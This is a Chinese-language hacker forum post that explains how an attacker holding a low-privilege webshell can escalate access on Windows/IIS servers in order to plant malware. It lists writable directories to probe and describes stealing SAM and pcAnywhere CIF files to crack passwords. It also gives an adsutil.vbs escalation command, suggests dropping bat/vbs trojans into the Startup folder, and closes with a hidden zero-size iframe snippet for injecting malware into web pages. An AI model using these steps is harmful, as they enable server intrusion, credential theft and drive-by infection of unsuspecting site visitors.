简单突破权限设置漏洞挂马
今天我要说一下权限设置的问题,有时候我们拿到了一个shell,但权限太低,只能在拿到sehll的站点的目录瞎逛,对于我这样喜欢在服务器站点挂马的人来说太痛苦了。
拿一个例子吧 ,比如asp注入,动网,动感,动易,尘缘等等漏洞,好多的,反正不管怎样我们现在有个shell
当我们取得一个webshell时候,主要要做的就是看看有什末权限,来提升权限,有权限才能知道个个盘都有什末东东,这里的学问很多,
c: d: e:.....
C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:\Program Files\serv-uC:\WINNT\system32\config下它的SAM,破解密码
c:\winnt\system32\inetsrv\data是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
C:\Program Files\Java Web Startc:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服务器支持PHP)
c:\PHP(如果服务器支持PHP)
运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。
冰狐网页木马比较常用,挂马的代码</html><iframe src="http://*****.htm" name="zhu" width="0" height="0" frameborder="0">
关于防护方面JHACKJ做过一个变态设置教程,大家看看吧,呵呵,给他做广告了,